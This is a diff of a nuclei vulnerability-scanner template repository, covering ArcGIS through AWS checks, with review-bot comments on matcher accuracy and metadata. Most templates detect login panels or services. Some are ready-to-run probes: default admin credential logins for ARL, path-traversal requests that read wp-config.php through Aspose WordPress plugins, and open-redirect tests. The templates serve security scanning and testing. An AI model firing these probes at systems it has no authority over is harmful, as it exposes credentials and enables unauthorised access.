@@ -0,0 +1,47 @@ +id: arcgis-panel + +info: + name: ArcGIS Enterprise Panel + author: Podalirius + severity: info + tags: docs,arcgis,cms,panel + description: An ArcGIS instance was discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/portal/portalhelp/en/' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS Enterprise' + - 'Installation and Deployment' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + + - type: regex + part: body + group: 2 + regex: + - '(Released Version:[\n\t ]+(([0-9]+(.[0-9]+)?(.[0-9]+)?)([\n\t ]+\([A-Za-z]+[\t ]+20[0-9][0-9]\))?))' + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-rest-api-533.yaml b/nuclei-templates/Other/arcgis-rest-api-533.yaml deleted file mode 100644 index b60cfd2026..0000000000 --- a/nuclei-templates/Other/arcgis-rest-api-533.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: arcgis-rest-api - -info: - name: ArcGIS Exposed Docs - author: Podalirius - severity: info - description: ArcGIS documents were discovered. - tags: api,arcgis,cms - reference: - - https://enterprise.arcgis.com/en/ - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - -requests: - - method: GET - path: - - '{{BaseURL}}/server/sdk/rest/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'ArcGIS REST API' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/arcgis-rest-api.yaml b/nuclei-templates/Other/arcgis-rest-api.yaml new file mode 100644 index 0000000000..897c70d812 --- /dev/null +++ b/nuclei-templates/Other/arcgis-rest-api.yaml 
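Review bot: The `classification` block in the new arcgis-panel-531.yaml carries an empty `cve-id:` key and a zero-score `cvss-metrics`/`cvss-score: 0.0` pair on an informational panel-detect template; the empty key adds nothing and may trip template validation, and both the removed arcgis-panel-530.yaml and the new arcgis-rest-api.yaml further down keep only `cwe-id: CWE-200`. Drop `cve-id:`, `cvss-metrics` and `cvss-score` here. Separately, the first extractor regex `' ([0-9.]+)'` captures the first space-prefixed digit run anywhere in the body, so the extracted "version" can be an unrelated number; anchoring it to a version label, as the second extractor does with `Released Version:`, would make the extracted value trustworthy.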
@@ -0,0 +1,29 @@ +id: arcgis-rest-api + +info: + name: ArcGIS Exposed Docs + author: Podalirius + severity: info + description: ArcGIS documents were discovered. + reference: + - https://enterprise.arcgis.com/en/ + classification: + cwe-id: CWE-200 + tags: api,arcgis,cms + +requests: + - method: GET + path: + - '{{BaseURL}}/server/sdk/rest/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'ArcGIS REST API' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/argocd-login-534.yaml b/nuclei-templates/Other/argocd-login-534.yaml new file mode 100644 index 0000000000..07b34bdba3 --- /dev/null +++ b/nuclei-templates/Other/argocd-login-534.yaml @@ -0,0 +1,19 @@ +id: argocd-detect + +info: + name: Argo CD Detect + author: Adam Crosser + severity: info + description: Detects the Argo CD website console + tags: tech,argocd + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: word + part: body + words: + - 'Argo CD' \ No newline at end of file diff --git a/nuclei-templates/Other/argocd-login.yaml b/nuclei-templates/Other/argocd-login.yaml deleted file mode 100644 index 546bbfd8cc..0000000000 --- a/nuclei-templates/Other/argocd-login.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: argocd-detect - -info: - name: Argo CD Login Panel - author: Adam Crosser,daffainfo - severity: info - description: An Argo CD login panel was discovered. - reference: - - https://argoproj.github.io/cd/ - classification: - cwe-id: CWE-200 - metadata: - shodan-query: http.title:"Argo CD" - tags: panel,argocd,login,kubernetes - -requests: - - method: GET - path: - - "{{BaseURL}}/login" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - '<title>Argo CD' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 
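Review bot: The new argocd-login-534.yaml matches on the bare string `'Argo CD'` anywhere in the body of `{{BaseURL}}` with no status check and no `matchers-condition`, so any page that merely mentions Argo CD (documentation, a blog post, a dashboard linking to it) is reported as a detected console; the argocd-login.yaml removed in the same commit was stricter (`/login` path, `'<title>Argo CD'`, `status: 200`, `matchers-condition: and`) and that precision is lost. The id `argocd-detect` inside a file named argocd-login-534.yaml, and the missing trailing newline, are minor tidy-ups. A tighter matcher block is below.
```yaml
# … unchanged: id, info, requests/method/path …
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '<title>Argo CD'

      - type: status
        status:
          - 200
```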
diff --git a/nuclei-templates/Other/arl-default-login-537.yaml b/nuclei-templates/Other/arl-default-login-537.yaml deleted file mode 100644 index 0b8d67077d..0000000000 --- a/nuclei-templates/Other/arl-default-login-537.yaml +++ /dev/null @@ -1,31 +0,0 @@ -id: arl-default-login -info: - name: ARL Default Login - author: pikpikcu - severity: high - tags: arl,default-login -requests: - - raw: - - | - POST /api/user/login HTTP/1.1 - Host: {{Hostname}} - Content-Type: application/json; charset=UTF-8 - - {"username":"{{username}}","password":"{{password}}"} - payloads: - username: - - admin - password: - - arlpass - attack: pitchfork - matchers-condition: and - matchers: - - type: word - condition: and - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/arl-default-login.yaml b/nuclei-templates/Other/arl-default-login.yaml new file mode 100644 index 0000000000..50f4ac4d1c --- /dev/null +++ b/nuclei-templates/Other/arl-default-login.yaml @@ -0,0 +1,38 @@ +id: arl-default-login +info: + name: ARL Default Admin Login + author: pikpikcu + description: An ARL default admin login was discovered. + severity: high + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + tags: arl,default-login +requests: + - raw: + - | + POST /api/user/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/json; charset=UTF-8 + + {"username":"{{username}}","password":"{{password}}"} + payloads: + username: + - admin + password: + - arlpass + attack: pitchfork + matchers-condition: and + matchers: + - type: word + condition: and + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 
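Review bot: The new arl-default-login.yaml and the new arl-default-password.yaml (next file section) send the same `POST /api/user/login` with the same credential pair, share the tags `arl,default-login`, and use identical word and status matchers, so a host with the default credential is reported twice under two ids. Keep one of them and drop the other, or at least give them distinct tags so a tag-selected run does not execute both. Only this file carries the `description` and `classification` block; if both stay, the password variant should get the same metadata so the two findings are scored consistently.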
diff --git a/nuclei-templates/Other/arl-default-password-541.yaml b/nuclei-templates/Other/arl-default-password-541.yaml deleted file mode 100644 index 08f426e7da..0000000000 --- a/nuclei-templates/Other/arl-default-password-541.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: arl-default-password - -info: - name: ARL Default Password - author: pikpikcu - severity: high - tags: arl,default-login - -requests: - - method: POST - path: - - "{{BaseURL}}/api/user/login" - headers: - Content-Type: application/json; charset=UTF-8 - body: | - {"username":"admin","password":"arlpass"} - - matchers-condition: and - matchers: - - - type: word - words: - - '"message": "success"' - - '"username": "admin"' - - '"type": "login"' - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/arl-default-password.yaml b/nuclei-templates/Other/arl-default-password.yaml new file mode 100644 index 0000000000..d1be4b04a1 --- /dev/null +++ b/nuclei-templates/Other/arl-default-password.yaml @@ -0,0 +1,25 @@ +id: arl-default-password +info: + name: ARL Default Password + author: pikpikcu + severity: high + tags: arl,default-login +requests: + - method: POST + path: + - "{{BaseURL}}/api/user/login" + headers: + Content-Type: application/json; charset=UTF-8 + body: | + {"username":"admin","password":"arlpass"} + matchers-condition: and + matchers: + - type: word + words: + - '"message": "success"' + - '"username": "admin"' + - '"type": "login"' + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/artica-web-proxy-detect.yaml b/nuclei-templates/Other/artica-web-proxy-detect-544.yaml similarity index 100% rename from nuclei-templates/Other/artica-web-proxy-detect.yaml rename to nuclei-templates/Other/artica-web-proxy-detect-544.yaml diff --git a/nuclei-templates/Other/asana.yaml b/nuclei-templates/Other/asana.yaml new file mode 100644 index 0000000000..b5d4fb3663 --- /dev/null +++ b/nuclei-templates/Other/asana.yaml 
@@ -0,0 +1,25 @@ +id: api-asana + +info: + name: Asana API Test + author: zzeitlin + reference: https://developers.asana.com/docs/using-terminal + severity: info + + +self-contained: true +requests: + - method: GET + path: + - "https://app.asana.com/api/1.0/users/me" + headers: + Authorization: Bearer {{token}} + + matchers: + - type: word + part: body + words: + - 'data:' + - 'email' + - 'name' + condition: and diff --git a/nuclei-templates/Other/aspnuke-openredirect-556.yaml b/nuclei-templates/Other/aspnuke-openredirect-556.yaml new file mode 100644 index 0000000000..ca498927f1 --- /dev/null +++ b/nuclei-templates/Other/aspnuke-openredirect-556.yaml @@ -0,0 +1,17 @@ +id: aspnuke-openredirect + +info: + name: ASP-Nuke Open Redirect + author: pdteam + severity: low + tags: aspnuke,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569" + matchers: + - type: regex + part: body + regex: + - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$' \ No newline at end of file diff --git a/nuclei-templates/Other/aspnuke-openredirect-557.yaml b/nuclei-templates/Other/aspnuke-openredirect-557.yaml deleted file mode 100644 index 1dcc28d81d..0000000000 --- a/nuclei-templates/Other/aspnuke-openredirect-557.yaml +++ /dev/null @@ -1,18 +0,0 @@ -id: aspnuke-openredirect - -info: - name: ASP-Nuke Open Redirect - author: pdteam - severity: low - tags: aspnuke,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/gotoURL.asp?url=interact.sh&id=43569" - - matchers: - - type: regex - part: header - regex: - - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*)$' \ No newline at end of file diff --git a/nuclei-templates/Other/aspose-file-download-561.yaml b/nuclei-templates/Other/aspose-file-download-561.yaml deleted file mode 100644 index 961f6980ff..0000000000 --- a/nuclei-templates/Other/aspose-file-download-561.yaml +++ /dev/null 
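Review bot: The new asana.yaml `info` block has no `tags:` line (there are two blank lines where the other token-spray templates in this commit put `tags: token-spray,<service>`), so a tag-selected run such as `-tags token-spray` will never pick this template up even though its id is `api-asana`. Add `tags: token-spray,asana` under `severity: info`. The file name asana.yaml also departs from the `api-<service>.yaml` naming the neighbouring files use for `api-*` ids; renaming it to api-asana.yaml keeps id and path aligned.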
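Review bot: The regex matcher in the new aspnuke-openredirect-556.yaml is declared with `part: body`, but its pattern `^(?:Location\s*:\s*)...` is written for the `Location` response header, which never appears in the body, so the template cannot fire on a real redirect and the check silently becomes a no-op; the aspnuke-openredirect-557.yaml removed in the same commit used `part: header`. Change it to `part: header`. The redirect canary was also changed from `interact.sh` to `google.com`; pointing probe traffic at an unrelated third-party domain is avoidable, and the reserved `example.com` (as the attitude-theme template in this commit uses) is the safer choice.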
@@ -1,24 +0,0 @@ -id: aspose-file-download -info: - name: Wordpress Aspose Cloud eBook Generator - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: The Aspose Cloud eBook Generator WordPress plugin is affected by an arbitrary file retrieval vulnerability. - reference: - - https://wpscan.com/vulnerability/7866 - tags: wordpress,wp-plugin,lfi,aspose,ebook -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-file-download.yaml b/nuclei-templates/Other/aspose-file-download.yaml new file mode 100644 index 0000000000..d349b9cfed --- /dev/null +++ b/nuclei-templates/Other/aspose-file-download.yaml @@ -0,0 +1,23 @@ +id: aspose-file-download +info: + name: Aspose Cloud eBook Generator - File Download + author: 0x_Akoko + severity: high + description: The Aspose Cloud eBook Generator WordPress plugin was affected by a File Download security vulnerability. + reference: https://wpscan.com/vulnerability/7866 + tags: wordpress,wp-plugin,lfi,aspose,ebook +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-cloud-ebook-generator/aspose_posts_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download-565.yaml b/nuclei-templates/Other/aspose-ie-file-download-565.yaml new file mode 100644 index 0000000000..ae52c36233 --- /dev/null +++ b/nuclei-templates/Other/aspose-ie-file-download-565.yaml 
@@ -0,0 +1,29 @@ +id: aspose-ie-file-download + +info: + name: Wordpress Aspose Importer & Exporter v1.0 - Arbitrary File Retrieval + author: 0x_Akoko + severity: high + description: The Aspose importer and Exporter WordPress plugin is affected by an arbitrary file retrieval vulnerability. + reference: + - https://packetstormsecurity.com/files/131162/ + - https://wordpress.org/plugins/aspose-importer-exporter + tags: wordpress,wp-plugin,lfi,aspose + +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' + + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/aspose-ie-file-download.yaml b/nuclei-templates/Other/aspose-ie-file-download.yaml deleted file mode 100644 index 6f7eefcba3..0000000000 --- a/nuclei-templates/Other/aspose-ie-file-download.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: aspose-ie-file-download -info: - name: WordPress Aspose Importer & Exporter 1.0 - Local File Inclusion - author: 0x_Akoko - severity: high - description: WordPress Aspose Importer & Exporter version 1.0 is vulnerable to local file inclusion. - reference: - - https://packetstormsecurity.com/files/131162/ - - https://wordpress.org/plugins/aspose-importer-exporter - tags: wordpress,wp-plugin,lfi,aspose -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-importer-exporter/aspose_import_export_download?file=../../../wp-config.php' - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - type: status - status: - - 200 - -# Enhanced by mp on 2022/08/01 
diff --git a/nuclei-templates/Other/aspose-pdf-file-download-570.yaml b/nuclei-templates/Other/aspose-pdf-file-download-568.yaml similarity index 100% rename from nuclei-templates/Other/aspose-pdf-file-download-570.yaml rename to nuclei-templates/Other/aspose-pdf-file-download-568.yaml diff --git a/nuclei-templates/Other/aspose-words-file-download-571.yaml b/nuclei-templates/Other/aspose-words-file-download-571.yaml deleted file mode 100644 index ac80fecb8c..0000000000 --- a/nuclei-templates/Other/aspose-words-file-download-571.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: aspose-words-file-download - -info: - name: Aspose Words Exporter < 2.0 - Arbitrary File Retrieval - author: 0x_Akoko - severity: high - description: The Aspose.Words Exporter WordPress plugin is affected by an arbitrary file retrieval security vulnerability. - reference: - - https://wpscan.com/vulnerability/7869 - - https://wordpress.org/plugins/aspose-doc-exporter - tags: wordpress,wp-plugin,lfi,aspose - -requests: - - method: GET - path: - - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' - - matchers-condition: and - matchers: - - type: word - words: - - "DB_NAME" - - "DB_PASSWORD" - part: body - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/aspose-words-file-download.yaml b/nuclei-templates/Other/aspose-words-file-download.yaml new file mode 100644 index 0000000000..751ec5377e --- /dev/null +++ b/nuclei-templates/Other/aspose-words-file-download.yaml 
@@ -0,0 +1,31 @@ +id: aspose-words-file-download +info: + name: WordPress Aspose Words Exporter <2.0 - Local File Inclusion + author: 0x_Akoko + severity: high + description: WordPress Aspose Words Exporter prior to version 2.0 is vulnerable to local file inclusion. + reference: + - https://wpscan.com/vulnerability/7869 + - https://wordpress.org/plugins/aspose-doc-exporter + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N + cvss-score: 7.5 + cwe-id: CWE-22 + tags: wordpress,wp-plugin,lfi,aspose +requests: + - method: GET + path: + - '{{BaseURL}}/wp-content/plugins/aspose-doc-exporter/aspose_doc_exporter_download.php?file=../../../wp-config.php' + matchers-condition: and + matchers: + - type: word + words: + - "DB_NAME" + - "DB_PASSWORD" + part: body + condition: and + - type: status + status: + - 200 + +# Enhanced by mp on 2022/08/01 diff --git a/nuclei-templates/Other/aspx-debug-mode.yaml b/nuclei-templates/Other/aspx-debug-mode-575.yaml similarity index 100% rename from nuclei-templates/Other/aspx-debug-mode.yaml rename to nuclei-templates/Other/aspx-debug-mode-575.yaml diff --git a/nuclei-templates/Other/atlassian-crowd-panel-580.yaml b/nuclei-templates/Other/atlassian-crowd-panel-580.yaml index d01a865ee9..3532e9a84c 100644 --- a/nuclei-templates/Other/atlassian-crowd-panel-580.yaml +++ b/nuclei-templates/Other/atlassian-crowd-panel-580.yaml 
@@ -1,16 +1,25 @@ id: atlassian-crowd-panel + info: - name: Atlassian Crowd panel detect + name: Atlassian Crowd Login Panel author: organiccrap - severity: low + severity: info + description: An Atlassian Crowd login panel was discovered. + reference: + - https://www.atlassian.com/ + classification: + cwe-id: CWE-200 + tags: panel,atlassian + requests: - method: GET path: - '{{BaseURL}}/crowd/console/login.action' - headers: - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55 + matchers: - type: word words: - Atlassian Crowd - Login part: body + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml new file mode 100644 index 0000000000..3dbd07b8b7 --- /dev/null +++ b/nuclei-templates/Other/attitude-theme-open-redirect-586.yaml @@ -0,0 +1,21 @@ +id: attitude-theme-open-redirect + +info: + name: WordPress Attitude Themes 1.1.1 Open Redirection + author: 0x_Akoko + severity: low + description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. + reference: + - https://cxsecurity.com/issue/WLB-2020030185 + tags: wordpress,wp-theme,redirect + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" + + matchers: + - type: regex + regex: + - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' + part: header diff --git a/nuclei-templates/Other/attitude-theme-open-redirect.yaml b/nuclei-templates/Other/attitude-theme-open-redirect.yaml deleted file mode 100644 index 27dc936559..0000000000 --- a/nuclei-templates/Other/attitude-theme-open-redirect.yaml +++ /dev/null 
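Review bot: The word matcher in atlassian-crowd-panel-580.yaml lists `Atlassian Crowd` and `Login` without a `condition`, and nuclei's default for a word matcher is `or`, so any page at `/crowd/console/login.action` that contains the word `Login` matches; the hunk reworks the surrounding request (it drops the fixed `User-Agent` header) but leaves this as it was. Add `condition: and` under `part: body`, and consider a `status: 200` matcher with `matchers-condition: and` as the other panel templates in this commit carry. The new `description` and `classification` lines are fine; note that removing the fixed `User-Agent` means the probe now goes out with nuclei's default UA, which changes what the target logs.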
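Review bot: The `description` in the new attitude-theme-open-redirect-586.yaml says the injectable endpoint is `'goto.php'`, while the request path is `/wp-content/themes/Attitude/go.php?https://example.com/`; one of the two is wrong, and the mismatch was carried over from the removed attitude-theme-open-redirect.yaml rather than fixed. Align the description with whichever path was actually verified against the referenced advisory, e.g. `... into the 'go.php' endpoint ...` if `go.php` is correct. Beyond that the only change here is the reference moving from a scalar to a list, which is fine.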
@@ -1,20 +0,0 @@ -id: attitude-theme-open-redirect - -info: - name: WordPress Attitude Themes 1.1.1 Open Redirection - author: 0x_Akoko - severity: low - description: A vulnerability in WordPress Attitude Themes allows remote attackers to inject an arbitrary URL into the 'goto.php' endpoint which will redirect the victim to it. - reference: https://cxsecurity.com/issue/WLB-2020030185 - tags: wordpress,wp-theme,redirect - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-content/themes/Attitude/go.php?https://example.com/" - - matchers: - - type: regex - regex: - - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_\.@]*)example\.com.*$' - part: header diff --git a/nuclei-templates/Other/atvise-login-589.yaml b/nuclei-templates/Other/atvise-login-589.yaml new file mode 100644 index 0000000000..bc58bf1715 --- /dev/null +++ b/nuclei-templates/Other/atvise-login-589.yaml @@ -0,0 +1,33 @@ +id: atvise-login + +info: + name: Atvise Login Panel + author: idealphase + severity: info + description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. + reference: + - https://www.exploit-db.com/ghdb/7837 + - https://www.atvise.com/en + classification: + cwe-id: CWE-200 + metadata: + google-dork: intitle:"atvise - next generation" + tags: panel,atvise + +requests: + - method: GET + path: + - '{{BaseURL}}' + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'atvise - next generation' + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/atvise-login-591.yaml b/nuclei-templates/Other/atvise-login-591.yaml deleted file mode 100644 index 74ba38fb08..0000000000 --- a/nuclei-templates/Other/atvise-login-591.yaml +++ /dev/null 
@@ -1,36 +0,0 @@ -id: atvise-login - -info: - name: Atvise Login Panel - author: idealphase - severity: info - description: An Atvise login panel was discovered. Atvise is a leading visualization and control center solutions based on pure web technology. - reference: - - https://www.exploit-db.com/ghdb/7837 - - https://www.atvise.com/en - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N - cvss-score: 0.0 - cve-id: - cwe-id: CWE-200 - metadata: - google-dork: intitle:"atvise - next generation" - tags: panel,atvise - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'atvise - next generation' - - - type: status - status: - - 200 - -# Enhanced by mp on 2022/03/20 diff --git a/nuclei-templates/Other/automation-direct-596.yaml b/nuclei-templates/Other/automation-direct-597.yaml similarity index 100% rename from nuclei-templates/Other/automation-direct-596.yaml rename to nuclei-templates/Other/automation-direct-597.yaml diff --git a/nuclei-templates/Other/avantfax-panel-603.yaml b/nuclei-templates/Other/avantfax-panel.yaml similarity index 100% rename from nuclei-templates/Other/avantfax-panel-603.yaml rename to nuclei-templates/Other/avantfax-panel.yaml diff --git a/nuclei-templates/Other/avatier-password-management-605.yaml b/nuclei-templates/Other/avatier_password_management.yaml similarity index 100% rename from nuclei-templates/Other/avatier-password-management-605.yaml rename to nuclei-templates/Other/avatier_password_management.yaml diff --git a/nuclei-templates/Other/aviatrix-panel-609.yaml b/nuclei-templates/Other/aviatrix-panel-609.yaml deleted file mode 100644 index e8c89b1cca..0000000000 --- a/nuclei-templates/Other/aviatrix-panel-609.yaml +++ /dev/null 
@@ -1,31 +0,0 @@ -id: aviatrix-panel - -info: - name: Aviatrix Panel Login - author: pikpikcu,philippedelteil,daffainfo - severity: info - metadata: - shodan-query: http.title:"Aviatrix Cloud Controller" - tags: panel,aviatrix - -requests: - - method: GET - path: - - "{{BaseURL}}" - - "{{BaseURL}}/assets/img/favicon-32x32.png" - - stop-at-first-match: true - matchers-condition: or - matchers: - - type: dsl - name: "title" - condition: and - dsl: - - 'contains(body, "Aviatrix")' - - 'contains(body, "Controller")' - - 'status_code == 200' - - - type: dsl - name: "favicon" - dsl: - - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" diff --git a/nuclei-templates/Other/aviatrix-panel-610.yaml b/nuclei-templates/Other/aviatrix-panel-610.yaml new file mode 100644 index 0000000000..65416dba45 --- /dev/null +++ b/nuclei-templates/Other/aviatrix-panel-610.yaml @@ -0,0 +1,40 @@ +id: aviatrix-panel + +info: + name: Aviatrix Cloud Controller Panel Login + author: pikpikcu,philippedelteil,daffainfo + severity: info + description: An Aviatrix Cloud Controller login panel was detected. + reference: + - https://docs.aviatrix.com/HowTos/controller_config.html + metadata: + shodan-query: http.title:"Aviatrix Cloud Controller" + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cwe-id: CWE-200 + tags: panel,aviatrix + +requests: + - method: GET + path: + - "{{BaseURL}}" + - "{{BaseURL}}/assets/img/favicon-32x32.png" + + stop-at-first-match: true + matchers-condition: or + matchers: + - type: dsl + name: "title" + condition: and + dsl: + - 'contains(body, "Aviatrix")' + - 'contains(body, "Controller")' + - 'status_code == 200' + + - type: dsl + name: "favicon" + dsl: + - "status_code==200 && (\"7c1c26856345cd7edbf250ead0dc9332\" == md5(body))" + +# Enhanced by mp on 2022/03/23 
diff --git a/nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml b/nuclei-templates/Other/avtech-avn801-camera-panel.yaml similarity index 100% rename from nuclei-templates/Other/avtech-avn801-camera-panel-611.yaml rename to nuclei-templates/Other/avtech-avn801-camera-panel.yaml diff --git a/nuclei-templates/Other/avtech-dvr-exposure-614.yaml b/nuclei-templates/Other/avtech-dvr-exposure-617.yaml similarity index 100% rename from nuclei-templates/Other/avtech-dvr-exposure-614.yaml rename to nuclei-templates/Other/avtech-dvr-exposure-617.yaml diff --git a/nuclei-templates/Other/aws-access-id-620.yaml b/nuclei-templates/Other/aws-access-id.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-id-620.yaml rename to nuclei-templates/Other/aws-access-id.yaml diff --git a/nuclei-templates/Other/aws-access-key-value-621.yaml b/nuclei-templates/Other/aws-access-key-value-624.yaml similarity index 100% rename from nuclei-templates/Other/aws-access-key-value-621.yaml rename to nuclei-templates/Other/aws-access-key-value-624.yaml diff --git a/nuclei-templates/Other/aws-bucket-takeover-630.yaml b/nuclei-templates/Other/aws-bucket-takeover-630.yaml index 4a7e880937..d08136f8cb 100644 --- a/nuclei-templates/Other/aws-bucket-takeover-630.yaml +++ b/nuclei-templates/Other/aws-bucket-takeover-630.yaml @@ -1,5 +1,4 @@ id: aws-bucket-takeover - info: name: AWS Bucket Takeover Detection author: pdteam @@ -7,18 +6,15 @@ info: reference: - https://github.com/EdOverflow/can-i-take-over-xyz tags: takeover,aws,bucket - requests: - method: GET path: - "{{BaseURL}}" - matchers-condition: and matchers: - type: word words: - "The specified bucket does not exist" - - type: dsl dsl: - contains(tolower(all_headers), 'x-guploader-uploadid') diff --git a/nuclei-templates/Other/aws-cloudfront-service-634.yaml b/nuclei-templates/Other/aws-cloudfront-service-634.yaml new file mode 100644 index 0000000000..26ab05d613 --- /dev/null 
+++ b/nuclei-templates/Other/aws-cloudfront-service-634.yaml @@ -0,0 +1,22 @@ +id: aws-cloudfront-service + +info: + name: AWS Cloudfront service detection + author: jiheon-dev + severity: info + description: Detect websites using AWS cloudfront service + tags: aws,tech,service + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers: + - type: dsl + condition: or + dsl: + - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" + - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cloudfront-service.yaml b/nuclei-templates/Other/aws-cloudfront-service.yaml deleted file mode 100644 index b247e81533..0000000000 --- a/nuclei-templates/Other/aws-cloudfront-service.yaml +++ /dev/null @@ -1,22 +0,0 @@ -id: aws-cloudfront-service - -info: - name: AWS Cloudfront service detection - author: jiheon-dev - severity: info - tags: aws,tech,service - description: Detect websites using AWS cloudfront service - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers: - - type: dsl - condition: or - dsl: - - "contains(tolower(all_headers), 'x-cache: hit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: miss from cloudfront')" - - "contains(tolower(all_headers), 'x-cache: error from cloudfront')" diff --git a/nuclei-templates/Other/aws-cognito.yaml b/nuclei-templates/Other/aws-cognito-638.yaml similarity index 100% rename from nuclei-templates/Other/aws-cognito.yaml rename to nuclei-templates/Other/aws-cognito-638.yaml 
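Review bot: The four `dsl` entries in the new `matchers` block are an exact enumeration of `x-cache` values (hit, refreshhit, miss, error), so a response whose `x-cache` header carries any other CloudFront status goes undetected even though the header still names the service. A single `- "contains(tolower(all_headers), 'from cloudfront')"` matches everything the current four entries match plus any other status CloudFront reports, and lets the `condition: or` line go. The deleted `aws-cloudfront-service.yaml` in the same diff has the identical list, so this is inherited rather than introduced by the commit.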
